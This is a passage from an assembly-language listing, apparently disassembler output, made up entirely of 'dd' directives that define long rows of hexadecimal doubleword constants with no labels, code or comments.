dd 4AD5F3F2h, 5DD99A32h, 0A182635Ch, 3325AE73h, 4BA35415h
dd 5B220BB4h, 0FF9FF157h, 60FE225Bh, 0D1C96989h, 44FA6AB6h
dd 87FAC1DBh, 71C3EA41h, 3C498735h, 74D7A73Ch, 0FF8F4C0Fh
dd 0ACFB9F8h, 0AA1F4BBh, 0C6DA587Bh, 95E4A111h, 6BE4317Bh
dd 0F6CC95A6h, 20EA1E8Ah, 0CD33943Fh, 3CEB782Ch, 8AAD355Bh
dd 0A3A49D2Ah, 0F58EFA40h, 2AE2BE3Eh, 0B53F5A2Dh, 7F030B7Fh
dd 5115289Fh, 0AC45FABFh, 0CDCC5CD7h, 58E1BE67h, 9BB8B406h
dd 274CD4DEh, 8F17BD25h, 95A2A328h, 0FFDE611Ah, 0B9D39950h
dd 0B8AA17D4h, 4D48FD39h, 0FB65CB7Bh, 0EA0CBA80h, 0E35F2E6Ah
dd 80F75294h, 4527654Ah, 0E4B52E4Bh, 4ECC0E5Ah, 655A85DCh
dd 0D4473F1Dh, 6DFF1315h, 70228C8Ch, 29DDA1D4h, 42AF3813h
dd 731C2DACh, 234F995h, 81E9A589h, 70AB3F01h, 0F27B7F71h
dd 6CEE0A82h, 271CB822h, 0FDEF5F86h, 997FC701h, 0F347362Eh
dd 0E56B9C3h, 45BDDE7Fh, 6BF1728Fh, 9818B234h, 0B61ED609h
dd 0BD545F2Ch, 0EB9F8A1Fh, 0A254EEB2h, 15597586h, 7D98DAA7h
dd 4AE759C5h, 2A62E539h, 99689695h, 3973EB7Fh, 603DF456h
dd 764FF7DAh, 0FF6777E7h, 340D4C4Ah, 0A1FCD355h, 0FFC7570Dh
dd 37ED5E70h, 0E2F70C24h, 0F4DE080Ah, 90C88F87h, 0E2A1DCCEh
dd 0E70C6153h, 0B13A23E5h, 566AF221h, 0AC0EA2A3h, 0C5A2FB4Eh
dd 50A7DFCAh, 9D59B536h, 54AA4E7Ch, 0C972BC65h, 0BD87DAD9h
dd 5AF8964Eh, 2B09878Bh, 0CFE9FF1h, 0E70F7063h, 9FE09BA8h
dd 672A3E97h, 417A91A5h, 0D5CF150Bh, 0A845F43Ah, 4A71C0F9h
dd 88E70DC9h, 1EFDB69Fh, 2951EDC8h, 56E92FACh, 0BFE79DCBh
dd 0BA662C88h, 28D7035Fh, 0C3916F6Ah, 968A8315h, 0C5DCF1B3h
dd 0B6CB5CDFh, 0B04D7D63h, 857EF07Ch, 0F0AAF6EEh, 90FDD719h
dd 0F98F2B97h, 783EA27Dh, 2DBEF41Ah, 0D32E35C8h, 0AFC0605Fh
dd 0CD74F5EDh, 0A91A615Eh, 18B392Ch, 0E0F3B5D7h, 0AB949D45h
dd 1E615527h, 0B34CAFB3h, 0B99F6B38h, 0CCB9AD9Eh, 4246ED0h
dd 326339DBh, 3BCD8D8Ah, 0B217C5B3h, 2A952921h, 0CB9D834Ch
dd 0F557B46h, 3C665597h, 85A31CC3h, 0BD634F56h, 526F5FE1h
dd 0BE801FBFh, 0AD4AE585h, 0E0535E7Ah, 19F107B3h, 33F73407h
dd 45C2E031h, 0F64D341Bh, 0F3258DBAh, 0E07ED0A1h, 0EFD739AAh
dd 0EE877C4Ah, 73598103h, 0ECCE6F79h, 6BABADD5h, 2FF20781h
dd 4CF758Dh, 76C936D1h, 0FAF65792h, 9AB34256h, 0AF888DCh
dd 6B827D69h, 0AE4BD5EAh, 0AA4E6164h, 4518E76Ch, 9765A829h
dd 0B856B230h, 0CD7941E1h, 1E7E5626h, 2EE899A6h, 0FC1DA5E2h
dd 0C9F34810h, 95BC7EDAh, 0CB0B59AAh, 1F060FDAh, 0A8C69A73h
dd 2DB4E331h, 0F392BA8h, 0C5A58FABh, 73387224h, 0FFBBEBCDh
dd 0A0F8B5F2h, 7F2C05F7h, 9D8E075Ah, 8B913F1Bh, 752302EFh
dd 9572B2F0h, 0A0336B27h, 2100278Bh, 74A2B272h, 74521910h
dd 7C20D0EBh, 92FEA278h, 2B2D4C6Ah, 652F0AB4h, 2FCA6B5Ch
dd 0C16B702Bh, 0B6EF0757h, 8AAA3E7Eh, 5F1B2F31h, 4197F788h
dd 0A1AAE6FFh, 53D9E2DAh, 0AEF974F4h, 0ED2444E8h, 67020033h
dd 0A1F81155h, 0B95D8C68h, 59622ADEh, 4E2BBA73h, 79585B93h
dd 3A5C83FDh, 1D378AB6h, 8DF64C38h, 0DEA539F5h, 0DB33ECE1h
dd 0EF642E7Dh, 680F68BFh, 0B53DBCE6h, 377DBCC8h, 32E7FB8Fh
dd 59462A49h, 0B1186C9Dh, 2AFDBD0Fh, 39249DCDh, 5B306155h
dd 38115F63h, 0F93D53E5h, 0D7C08A9Bh, 0B01F4A71h, 72E0FAA9h
dd 1BF204D1h, 5A6921F3h, 40A19783h, 4D8959C1h, 8E07FD7Ch
dd 97D4D2EFh, 0F8D6A773h, 6518D782h, 0C0B19D55h, 915D7DE5h
dd 0E056660Eh, 0FE9711B3h, 637CC926h, 0BB1EFC7Dh, 153FE788h
dd 85B6BACAh, 0E473CDA9h, 95582F51h, 22292BA5h, 9FF93EF4h
dd 0B7B058FFh, 0AB4D2CA2h, 671C5229h, 0FD9BEDCEh, 0D6AAEEECh
dd 88062517h, 6AB9CC57h, 0DA397FECh, 497B1E55h, 168A4E64h
dd 127F40BEh, 0FFBAF388h, 6D29B6D6h, 0FC4FF52Ah, 0DB4FBD2Eh
dd 1DE79067h, 0FC38EBE3h, 93379CEAh, 0B9313C38h, 35A2464Bh
dd 92E684A5h, 5F59AD95h, 4994A789h, 37E450B5h, 0E5D17975h
dd 0F4A77651h, 0D7037C15h, 477F0B64h, 30CAE0D0h, 917A51F1h
dd 2855C927h, 0FE9C9DA2h, 1EFD5D47h, 0C5F354Ch, 2519BB30h
dd 1A5B8EADh, 38D6768Fh, 75687668h, 8D705619h, 0D3E54CCDh
dd 0C36EA2EAh, 584E9A33h, 0BCD24522h, 0CB4D3762h, 97C7B156h
dd 0EF6F470Ah, 2FCE031Ah, 0E4127736h, 0A6EBBA4Ch, 27067427h
dd 9556F985h, 7AACD4E8h, 0BF211811h, 23CE4579h, 30036CCBh
dd 55DACB2Fh, 4FB613B5h, 0D6D2C2B7h, 80F5834Ah, 62E32882h
dd 4B4758A5h, 1F142F45h, 7F1EB5DCh, 148F4408h, 4BA83C6Ch
dd 26FCC1E4h, 307C39B5h, 7DB4D232h, 8E13E8FBh, 56404CBFh
dd 929E3995h, 1C2CC3ABh, 0BB4BF719h, 0EB7DF8DDh, 30B9E87Ch
dd 9F68350Ah, 0D64A770Ah, 0FC28BEE3h, 0FB8D5CDh, 0CC72C91Dh
dd 14E48369h, 253AA156h, 0A43FBF37h, 86D147CDh, 219D28F5h
dd 68DCD0EFh, 161D7715h, 0AE25F8BFh, 0A6B6F7E9h, 9A5CFE09h
dd 0F38656DEh, 0F4576C0Ah, 0A3C19CEAh, 83140085h, 7AF5295Dh
dd 1AC49460h, 1C148D8Dh, 5FC32591h, 7DAB960Ah, 43C032CBh
dd 0A69C6709h, 6082F331h, 4F76917Fh, 0CA8EF167h, 0E673FAB4h
dd 0AF8DD0BFh, 5D5848B0h, 5830912Ch, 0E9B16626h, 96E15E4h
dd 4B1032ACh, 0CF9C7D7h, 0B9DDCCE7h, 0FE31FC5Bh, 9B6BB0BFh
dd 57514657h, 831789D3h, 3B132297h, 44079F23h, 0A344525Dh
dd 3D752A0Bh, 3E5D9FC9h, 95DC773Ch, 47705957h, 0DD685530h
dd 0A44EAF8Ch, 750455D9h, 5AB7A565h, 0EED5F479h, 2AA61575h
dd 0D58BA171h, 111F59DBh, 82AC607Eh, 8872406h, 505FF45Bh
dd 0AD1D838Dh, 8380530Bh, 0AB57496Dh, 988AD5BDh, 0C86F7063h
dd 5292C9BDh, 4865687Ch, 0F5F15847h, 70FCE5F7h, 3AEB82B3h
dd 24237C12h, 0E2E092B9h, 0FD6B20EEh, 54E8E678h, 0F75B361Ah
dd 675EA2A5h, 72A69182h, 99FEA939h, 0BC9A477Eh, 0B81F5570h
dd 0CC4F3421h, 0EB3CBFCCh, 0D8CDD15Ch, 0F9BB9881h, 9B7B50C6h
dd 0BF56E1F9h, 0CFFCBE52h, 0B03D655Dh, 9E93DD6Ah, 0F755996Dh
dd 0F1230999h, 16A64844h, 0C32B2F79h, 0A5E4E749h, 0B607BC76h
dd 0A0293B24h, 4F6B1196h, 2D516156h, 0BE1515F6h, 0EB4468A9h
dd 82A2DC3Bh, 99C2E295h, 0EE5A2A03h, 22FED6F1h, 4C0CF2FFh
dd 0C9FEF05h, 799A23FCh, 2A058C36h, 0F166287Eh, 0B5A2C55Bh
dd 0DF6C444Ah, 0D0EB0D80h, 0F07C1FC4h, 0FC14EAD5h, 0F1BAA90h
dd 0EC61D35Ah, 0BAB3EA41h, 55B3B9AFh, 0AB9B150Ah, 0BEAA8BD0h
dd 87C61DC5h, 0D2FD28B6h, 4A9E7B09h, 2E662AB4h, 3C9BC779h
dd 43C65643h, 0CE944749h, 508AAAA5h, 6BF688C6h, 75561C1Fh
dd 15D63768h, 0AB4B8ECCh, 0EB8D0D50h, 5DDA6A5h, 0E19B3099h
dd 0BCD3096Bh, 0E5E0B477h, 36DFAF12h, 0BFA38534h, 0D7B4EE8Ch
dd 23B361D9h, 659B707Ch, 0EC2168B4h, 0F53904CDh, 0CB0CCA86h
dd 16F37E86h, 12E5D91h, 6A4AFA1Ah, 367D8933h, 7A15E94Bh
dd 14AEB94h, 0DE480AD6h, 44EEC2A0h, 59437074h, 8284A6F1h
dd 6DF17BFDh, 0A3BEB382h
dd 0C7CF12BCh, 40E119D5h, 0F2E96896h, 1B6110AAh, 0FC4B4837h
dd 0B4FC63A4h, 2A4BF9A5h, 3E381E50h, 0CF4A76F8h, 50971297h
dd 0C429D6FAh, 2FE66BBCh, 0B70625DEh, 0B5503A8Ah, 9DA2C48Ah
dd 638D9BAFh, 0F0541D1Ah, 41A7A3F0h, 0A4DCBA1Eh, 5E6CC34Bh
dd 36BAB2D4h, 3DA9AC5Ah, 982DCBDh, 4681E7CEh, 7A2FFBD9h
dd 0D7780B80h, 0B08BA3B5h, 5F2DFB97h, 40A91EAAh, 736FC85Eh
dd 44159FF1h, 0C5CEBD54h, 92E1B016h, 3F3D0633h, 0FCDF3ED3h
dd 0D1B6ED1h, 14675FA6h, 0BA09113Ah, 0CBCF0C08h, 0F67E03F9h
dd 5CD26565h, 0AFB28D41h, 8EA19226h, 0B12E243Bh, 0D53B6767h
dd 407DFBA5h, 15C7FF09h, 53F17683h, 0E2E2F67Dh, 9D9A879Bh
dd 1F831135h, 87957C56h, 4B919131h, 3BD0A5B3h, 0BEAAD475h
dd 33B4EEAFh, 32AFC442h, 0DC371954h, 3E8835D5h, 0E3BBD2D1h
dd 1BE15B9Eh, 25B7A089h, 0E3FBAD64h, 0B5E735F7h, 0F059B91Eh
dd 1725FAA8h, 51841430h, 0FBC05C24h, 5A6E4333h, 473AF272h
dd 0CE56932Fh, 0A511B74Bh, 7B9F30BDh, 0ECAE2AECh, 0F24F7394h
dd 605FE5FDh, 0BE46775Bh, 0D8CAEFAEh, 1B0B28E5h, 80E72FFCh
dd 0F6F37416h, 3C739F77h, 0F51A61FAh, 65E24EAh, 555B367Eh
dd 9CD5BF8Bh, 1DD8FEB1h, 0CC8DE67Ch, 65417E00h, 0D5A17817h
dd 54254AB5h, 4FDFF89Ch, 372F7CB3h, 13BAD241h, 9E93F2DCh
dd 0A85AFCD6h, 1A2F3179h, 0A8FC23F3h, 0A75AAD55h, 2FE62594h
dd 1CF2416h, 0B2AAD17Ch, 2EEDEF93h, 65C947Ah, 0F16B21D1h
dd 5CEB09FEh, 88C9513Dh, 64B0464Bh, 7BD12B5Fh, 0D1FCFC66h
dd 0DFCAE0C0h, 42A59A2h, 0DEAB118Eh, 77FDAB4Ch, 90D7C8E2h
dd 3539C0D1h, 0BD7D394Ah, 0BE6D4266h, 3FDFA2Bh, 7AAFE61Fh
dd 792AC50h, 4957DAADh, 86D80A45h, 6EEEC462h, 70AA0E60h
dd 1B37E232h, 0FB039C6Bh, 57C8A4ADh, 5DB3B1DCh, 6D55D6FFh
dd 0A1600EB9h, 182F1BC3h, 51FB2AE6h, 544AA627h, 2F1D9515h
dd 0CEDFD2D5h, 71724D55h, 1B146355h, 67FC247Fh, 0B12EA177h
dd 375BD1CBh, 8B63B2E1h, 4D7E4D69h, 0CAF913DFh, 73776F0Ah
dd 5F588743h, 5A2046A6h, 49EDA229h, 0F34D2FC5h, 554C1269h
dd 5E706D24h, 0B06E9ED9h, 0A70A3DD2h, 83C65B2Eh, 0C7227FE7h
dd 0DECE5D62h, 0FC415895h, 6D26081h, 3E3AD71Ah, 7FF7E1B0h
dd 0E06D07CBh, 156DE0F0h, 0D2F06317h, 1B0832B4h, 0F16827B3h
dd 14EFCB84h, 0E6EE3172h, 6BDAEF9Ah, 7B154BD8h, 0C258B0B9h
dd 0EE885B4Fh, 0EB2E5741h, 0E380F250h, 65A22E8Dh, 998AE07Ah
dd 7FCB14E5h, 0BE365B24h, 418B393Ch, 9A31DD12h, 4EEB77AEh
dd 1D7E06E0h, 0B8CFED08h, 0A3613F3Bh, 0FE96F9E0h, 135AAA6Ch
dd 0B4DB1887h, 1829BC10h, 72BD783Dh, 9A276C6Ah, 0A2CFBA57h
dd 4DA5949Dh, 0A58F7663h, 15180B80h, 996298ACh, 0C4DE5885h
dd 6FCBADA9h, 2FCA6F8Eh, 6D7D37F7h, 0A768B75Ch, 0BAA7C19Ch
dd 5B8111AAh, 8DF505A9h, 0F07DBA8Ah, 7148E0F2h, 5D4C4B42h
dd 8F596ABEh, 0E183E106h, 2D47292Bh, 1854646Dh, 0ADF99956h
dd 0A31971BBh, 6AEBDA9Dh, 0EA82FA90h, 0F1D37238h, 0D1927A70h
dd 732BEA7Fh, 0F3C45286h, 9155392Fh, 25FDFE37h, 0FE5D6545h
dd 0C791FAD9h, 0A679831Bh, 5A308404h, 8BE44D8Ch, 0D8DCF095h
dd 0E823E469h, 4A593115h, 0FC6AC814h, 179BA4FBh, 6844F683h
dd 0E8F7BC39h, 0AB8AF2DFh, 0BA75E552h, 53674826h, 795A77B1h
dd 846368E8h, 0BBCA8149h, 0A2FF03E6h, 0BF8BF857h, 0B5866AEDh
dd 9B3B3799h, 26899E5Ah, 0D2B9266Fh, 5A66FD38h, 9FC9D1A7h
dd 2D9D7E48h, 3594DE7Ch, 961554D3h, 0C0AE14A7h, 0D1AE81E6h
dd 892B98B9h, 0F1371318h, 8D4094C3h, 0A1CA2F9Ah, 46294A34h
dd 5EEA7A7Ch, 3A1D5B10h, 0A4ABF75Ah, 51839440h, 832C9F4Ah
dd 0B275AA33h, 50F2758Eh, 32663F2h, 614E92AEh, 14BB24EDh
dd 5ACC5DFh, 6B0D65E2h, 0DF16DAC4h, 7A54E57h, 0CC5F8836h
dd 9EE6F8E5h, 98EFE28Ch, 0F63657DBh, 2AA3E93Ch, 0BE20BE1h
dd 37F131DFh, 414AFD96h, 0DFE0A141h, 6855CAC3h, 0EAF28E7Fh
dd 9F39416h, 25CEEE5Ah, 0E7D3F5C1h, 0DA81A9DAh, 5B7B23D9h
dd 94AE87BFh, 4EC8B21h, 0FC3DE4Ah, 0CF1823C9h, 742FF07Eh
dd 7E63615Ch, 1E100B4Bh, 349A8ED7h, 0A3C9FA34h, 21A28C85h
dd 16A44A68h, 8D3131C5h, 30986836h, 85F3D063h, 1EEEB020h
dd 7ACFD8A7h, 8A864EFFh, 0C72F9073h, 17E020BCh, 0B4CACEAAh
dd 38C4F877h, 0A25C1AE5h, 0AFAA5CDh, 7AE8C9B0h, 146138E9h
dd 9351EB4Ch, 4D89FCCAh, 756B827Ah, 0FB7A4FB2h, 0A90F461Ah
dd 6B1E5AEh, 0FA6D4CA1h, 0A01FAF96h, 5DD1E68Bh, 47F43CA2h
dd 9F1A64A9h, 6E68ED00h, 2BF3995Bh, 0F22C1B60h, 67E53E6Ah
dd 5F17989Fh, 0F1C3EDB2h, 85864E24h, 25686815h, 45244BB7h
dd 0EAE45499h, 1B8397ECh, 9D5E3EDFh, 45F07236h, 7E8A2288h
dd 0F1D91371h, 0D1FAB48Eh, 5A255E4Fh, 0A11465B6h, 766F6D6Dh
dd 672DAA22h, 0EB0E46AEh, 0D4EF467Bh, 5DE5B322h, 602883DFh
dd 0A72B85A3h, 9132EC69h, 8CE45AC9h, 0B0A95C8Fh, 3BEAEDF1h
dd 32707636h, 20A6B3E4h, 3E9C33EDh, 669A6FA4h, 88DE3C0Fh
dd 36BD7255h, 2D30DA03h, 3C97A658h, 120DABBAh, 46CD058Eh
dd 3F44F775h, 6AFD2813h, 5B8F24E1h, 7CF6EF1Eh, 772E01FDh
dd 0E6E18E22h, 5546D179h, 25B63E0Fh, 0CCEA6AE3h, 2B5D17FDh
dd 607CF728h, 7D0DF5A5h, 0B6D4B1ABh, 86075ADAh, 0E5C9934Bh
dd 0FC6FDD56h, 495E79B0h, 0ED12655Fh, 738AF445h, 1A98CB24h
dd 0E6AFA890h, 0DFED0CCAh, 7D6AA552h, 0C6BF7E61h, 0B28650BCh
dd 0A1E7976Ah, 4523DA40h, 0DBB2E53Ch, 2BF5A455h, 2BB9947Dh
dd 5596EC36h, 8CDFDFADh, 0BD6E1353h, 0E7996356h, 6B2BC61Eh
dd 7574C4C0h, 0DE6E9BB7h, 6FA69C37h, 2710E7F4h, 6F903A09h
dd 6E169601h, 1EDD91E3h, 0A9CBF428h, 0B483E3B9h, 0C1F0E84Ah
dd 0A88DFB0Fh, 9DE3E8AFh, 89B1981Eh, 0B5B9711Ch, 6A2E4E7Fh
dd 9C8A255Ah, 7B28BB13h, 0AD70C79Ah, 0B43869ECh, 0C745CE2Fh
dd 342A8EE5h, 92E58D4h, 0E939AE2Eh, 0C7025C49h, 32915C5Fh
dd 0F7DA5E9Fh, 0F2322E0Fh, 21C0EACCh, 0CE85F64Ch, 2FDF62FFh
dd 0F7215689h, 80D5222Bh, 0C459468Fh, 502E0708h, 0A4F75CC5h
dd 42DC0D58h, 0E6A9A944h, 0F9F9BDF6h, 58FF8833h, 0DF2D9865h
dd 0A792DF8h, 62D5F0BFh, 68AC64ABh, 0F9FB0A6Eh, 4B8DACAEh
dd 0E984D0C2h, 0DCAA6B2Ah, 84E05A77h, 2839926Bh, 0EC93F259h
dd 0C8BD770Bh, 0AE3DDEFFh, 817C4090h, 559155A3h, 27E0CDD8h
dd 9D8C321Fh, 0F926C78Bh, 0C242CC67h, 15A4AFA7h, 5D93A8A9h
dd 53B4D2BEh, 932D1AA1h, 87CE6676h, 0B4E32338h, 624BE07Ah
dd 68143D63h, 915BAF69h, 0C0FBB145h, 738B4129h, 5C2F4A6Bh
dd 5B2A442h, 0BAB4D0Dh, 0C69EECE9h, 86DE6F85h, 0ECED7B11h
dd 0E441BB5Fh, 0F68BD223h, 0D44D5BA0h, 12977FAAh, 8EE6FD94h
dd 92B738C2h, 76CF1A65h, 5FF03D35h, 168DF31Bh, 6BAAD727h
dd 39BDE02h, 6A9055BEh, 0D2D77762h, 0EBF961B5h, 887CD3DEh
dd 0F920B545h, 6CA675Ah, 9B825F73h, 523B9D44h, 76CA0D34h
dd 0D4FB1530h, 6AA3AC91h, 612D9BE6h, 57849933h, 6E3CAAFh
dd 0AB2E114Dh, 53A4F118h, 312D7557h, 3615AB0Eh, 2FADA5DBh
dd 0FB3F64A4h, 0D968D4B2h, 0D4B9F627h, 0ED6CC766h, 2A3B13A7h
dd 0BD01D6A6h, 7076ADE4h, 0FF836609h, 4AD7688Eh, 8D4CE682h
dd 0E2F902CBh, 0CB5E5D86h
dd 0B53E6655h, 657425D2h, 0B2FFB2C1h, 87E9682h, 1A83CB27h
dd 2D5098EBh, 974717C6h, 0E130B463h, 0DB065247h, 21CCCFE9h
dd 0F3AE4B94h, 1EEDCDA7h, 0FAD90F82h, 5D78D6B2h, 0FD2495F4h
dd 0FE4BBB18h, 50BF8871h, 1D9790EEh, 7059D68Eh, 7EAD2DE5h
dd 12452639h, 736B41DAh, 0F94E05EAh, 0CEFD65D8h, 29A9D60Eh
dd 303D1F39h, 96DA5A27h, 0EAF62D35h, 434C5196h, 0E6A65EDEh
dd 0C1CF59B7h, 0F49D730Dh, 627F8E57h, 5E9CBD96h, 758A20B6h
dd 0F6D67A66h, 0C5742F05h, 0FB433F9h, 41A509ABh, 29C30CBEh
dd 0B4B023F1h, 0B14150B1h, 659067F3h, 6E5C88D2h, 795DC44h
dd 9EF6AD7h, 6BE0045Eh, 9E023DADh, 0F0E2C646h, 0E22D0A02h
dd 31553BF4h, 0B134648Ah, 7BFB19D7h, 5A0A51E6h, 0FBA6C7ABh
dd 6FAF60B1h, 2FEEDCCEh, 0AF5E15CAh, 50AC8D40h, 0FCC19FF7h
dd 0FF5007FEh, 0D4C0B9FDh, 0A8995DA5h, 79D6E428h, 0BBEE9915h
dd 0A359061Ch, 5F490616h, 0EF9D2925h, 9F31C5A9h, 957EC51Ch
dd 0D518306Ah, 0E6EAD42Ah, 9CDD9E2Fh, 773DD77Dh, 37A2312Eh
dd 24AE4CB9h, 0F29B8FC1h, 0F37E08E4h, 51AE81FEh, 5563AD7h
dd 0B44B3BB7h, 53495F9Ch, 2A80F66Bh, 63021182h, 3D812676h
dd 0B0957716h, 0C044E1F3h, 0B9080C4Ah, 87E06079h, 57695B12h
dd 35672AB6h, 83F0AD4Bh, 900503EFh, 9CF8760Ah, 0D17173F6h
dd 32EACB4Ch, 0FEB572AEh, 0F68A91DDh, 5C99D1AAh, 0C391B6A4h
dd 0D9447138h, 52C5CC46h, 5A941911h, 838E4D15h, 7A96890Eh
dd 7DBF1B6Dh, 71598A66h, 799E34BDh, 60B0BB22h, 2EDE5DD4h
dd 70DB7031h, 0A247D41Fh, 1D634E0Fh, 7F75109Dh, 0CD1461A2h
dd 0D42DF588h, 0CF9E2228h, 0EFFC74CDh, 0DA3F5779h, 0E519C6C9h
dd 6653DC4Fh, 38EFAA8h, 0F161225h, 0B938AAA3h, 0E3692C1h
dd 0DEACE0Fh, 60796B97h, 0EC714E62h, 94C17EE7h, 8FB50A3Ah
dd 6223F418h, 0C6D0E99Ah, 0BC07A0C3h, 0D607F34Bh, 8913EC4Ch
dd 0B19E4C95h, 0C8A4FB6Fh, 0B4B388C1h, 52B73190h, 1294322Ch
dd 0FA9054E8h, 61C1C36Dh, 0F0A7FC27h, 0ECFEFDB5h, 0C68FF2A5h
dd 0FF35EF83h, 209486A1h, 0EF9EF68Eh, 2CADB87Ch, 0B70BF7Fh
dd 2A3CD918h, 61DC5BEAh, 0DFE81F0Ch, 0BF458DEDh, 0B37CDBA3h
dd 0CCD03AAEh, 5C42A496h, 0CB981B6h, 6B8145E5h, 76F4CFA9h
dd 0FE749D97h, 94AB4B12h, 0C4AA9A9h, 4CCFAC94h, 56441C8Ch
dd 0EC8B72E4h, 604F16D6h, 5CF5960Bh, 0D0C5C132h, 245B4F7Ah
dd 1D28D969h, 0DFDF1549h, 8C914C5Ah, 0FF87ABBCh, 0B1AEDA02h
dd 50FCA8AFh, 74D5592Ch, 0AA436F45h, 0EC852FCh, 0AAAAD40Bh
dd 0D3FA1252h, 38EEBD01h, 6884EE77h, 0E9FDC75Dh, 5B11AA76h
dd 0A786F24Bh, 0A1F7A8D0h, 0B3057B4Ah, 0A81D5ADEh, 0F63BC011h
dd 604CBFBBh, 33EC780Bh, 79E2CDA8h, 67D3217Eh, 0D3D2965Fh
dd 0D8668FCEh, 0F3CB95DAh, 2ED36886h, 6D9044D3h, 496B1B40h
dd 0F7E8F3F1h, 5B728741h, 4A6CAA9Ah, 0E7D3B1EFh, 3ED4BE6Ch
dd 0F2E35A8Dh, 0CDFD9CC7h, 6675EA1Eh, 4ED178BCh, 518908E5h
dd 0D9E2EAF4h, 633BE320h, 2A0E2EF5h, 3926CBD3h, 7D54987Eh
dd 0BF32CD64h, 4F8CDC66h, 0DB7A53C4h, 605749ABh, 4F84A4F3h
dd 87A5F442h, 9F17961Fh, 68CE6482h, 0DA03E065h, 78CAFAD5h
dd 0FA92CFF5h, 0AD36C1E4h, 15E5F351h, 0BA9FCB2Ah, 2A21EEB1h
dd 0C14BDC0Fh, 33FC6798h, 0D382F0BCh, 0A9719489h, 4DB8386Eh
dd 2F07CA26h, 0C895BAB1h, 0D673EDA2h, 2ACB135Ah, 74FE632Dh
dd 0DCE9036Ch, 66F02CCAh, 1155A8EFh, 0AF6A4E20h, 0C3B263B7h
dd 72EDFF0Dh, 321A1470h, 0CE1E80F7h, 9EA591F9h, 0F4F466FAh
dd 12497D64h, 344C5164h, 0EA8EFBF2h, 0B2DF3272h, 24E72D1h
dd 21B55156h, 0A9B24FF7h, 7BC3A1ABh, 1FBF67AEh, 0A3DB5F4Ah
dd 0F665DBBAh, 72A25CB8h, 0F14F41E7h, 0C6CCE07Ch, 0D7CAC70Bh
dd 429031A4h, 742A22Ch, 62C2EB1Ch, 0EE695F8Fh, 99D86631h
dd 9F5508FFh, 0A2B8D615h, 2D426449h, 0C9647904h, 976388Ch
dd 0F7C7F1AEh, 0F458944Fh, 9078D3DCh, 8A0BE0Bh, 3E2ABE40h
dd 3399E8D4h, 7CD3F96Ch, 72459251h, 0B80A3E00h, 0DCF22573h
dd 790CC915h, 0CE5F607Ch, 0B4512DB3h, 9896878Fh, 3E30566Ah
dd 0E6785414h, 3339CA36h, 3FE15F83h, 0D2AAE1B7h, 4F71B512h
dd 39828969h, 0D91E6F46h, 94CBA730h, 4ED8D2E3h, 9C8565EDh
dd 0F7CE35B0h, 91433DB2h, 0B653EEDFh, 76F8FF2Eh, 52E721EBh
dd 0AF56AD27h, 0B03DCA7Fh, 0B71AC748h, 5EB529D5h, 46A7F66Fh
dd 0E793AAECh, 1F9703FAh, 0C25D150Dh, 99EB51CEh, 0B52BB0E2h
dd 81DE6AC2h, 0AAD31516h, 70E1FA4Ah, 0DD6A55D0h, 0B8BF094Ch
dd 95B1612Ah, 427C4FFBh, 322ABDB4h, 12956810h, 0FAAEB919h
dd 20ED453Ah, 76498FF1h, 0B7D1DA2Dh, 0AC7FCEC6h, 0C8B0E1B1h
dd 0DC5F2595h, 8E646A5Eh, 6C7D4623h, 0EB84B60Fh, 0EE6A859Bh
dd 172E5C66h, 0B268A82Dh, 2B456298h, 0DF74E6D5h, 1D13F3EDh
dd 254FB229h, 8BFD03EEh, 7E9D927Ah, 2B93A038h, 0B596E00Ch
dd 0BFBDAC5Dh, 35D11357h, 0E85BD656h, 0B694E62Dh, 8BDE9EEDh
dd 0F7D4C3F1h, 0D053C844h, 569E9F46h, 0E2EDE8A2h, 7C2D3D5Eh
dd 0D2A0E0BAh, 9A8317D8h, 7A48F0D2h, 0B44BAF05h, 6E527FC3h
dd 52D0E967h, 69D8F550h, 876AAA95h, 4FF56658h, 610C5BADh
dd 7045CD41h, 0D6F3D06Ah, 47AB572Bh, 937867AFh, 9EDC8C43h
dd 0DE907457h, 174C8CFDh, 81F51C6Bh, 0B67B6A9Dh, 0D0445B20h
dd 12451747h, 3283B4CBh, 84557D69h, 0E0D96B38h, 3F54856Eh
dd 0BEE77F0Eh, 755B5F5Ch, 0E937D793h, 2D03056Fh, 91ED5CB1h
dd 90DE8BEh, 46F1B32h, 58DD7592h, 9FA75AA1h, 0D054733Ah
dd 0AFF8BB13h, 9CA69CCCh, 0A90BCAEEh, 7FD3129Bh, 856D176Ch
dd 984740E4h, 49D1E602h, 0E78C90DDh, 8D796D2h, 0EE13519Eh
dd 54EBBEF4h, 8C99050Bh, 12CF9553h, 0BFA464A2h, 81F06DAAh
dd 96A25AF3h, 3A9EEDF6h, 63E45F9h, 0DD7F0518h, 0E686349Bh
dd 16C62103h, 0BFB7EFB7h, 0EDD7D13Ah, 0C04809Ah, 25E30791h
dd 0B5FEDC95h, 0C21B7A97h, 119871D8h, 58144ADh, 0BFFAF622h
dd 34F4E86Dh, 3975E998h, 0C78EED27h, 978E9A54h, 0AFBCF59h
dd 0FA855162h, 1F370C07h, 0AE23B210h, 4A6E1786h, 0B1AF7A33h
dd 25C915C0h, 149233E6h, 0C228741Dh, 430CDC59h, 0CA711D05h
dd 7079E4C0h, 0C303A087h, 0E2FC3F47h, 418E58F4h, 0D39DB8FAh
dd 0B531046Ah, 4E2EF339h, 89C1550h, 85FC5B23h, 5A3E6C2Bh
dd 489EA455h, 492D2BB6h, 569BBEB1h, 733D6154h, 0B2505514h
dd 81C4AC0Ah, 0AB5CD83Ch, 4E636105h, 56929DF3h, 0F478B58Bh
dd 2B13FB81h, 955F6253h, 0DD6B6B37h, 7CEAE710h, 0BCBCAD1Ah
dd 0DE9BBF97h, 69B58996h, 5E1E3BADh, 7F25B55Dh, 977E5DADh
dd 0D4B5E2F7h, 7A123991h, 505327BFh, 0E725FC1Ch, 3953968Ch
dd 897C4DE5h, 498B633h, 99BF41B9h, 997AF9Fh, 0F3CD7E81h
dd 0D44515AFh, 7385C8EDh, 74AD5FB4h, 0AAFA999Bh, 0DE04B0B8h
dd 487C6591h, 6377BEDFh, 7B9AFADAh, 0D0B95408h, 5D7EE600h
dd 0FCEA51CCh, 0C6C1A605h, 44E5CB12h, 64275733h, 4EEF701Dh
dd 71A49A3Fh, 41ACDF8Bh, 87E1E217h, 0C5BA2775h, 0FC63E9B8h
dd 0FC151D3h, 0C0C0200Bh, 0B36649F8h, 570DBAB3h, 97F3A8A2h
dd 1471D4D6h, 5CFD82D0h, 756AB16Ch, 5A28EBE4h, 2FA5CAFEh
dd 0BC53EAACh, 0C8BF46E8h, 3A8827EBh, 6496D73Ah, 4C2D7A32h
dd 0D17DF64Fh, 0C0C1736Ah
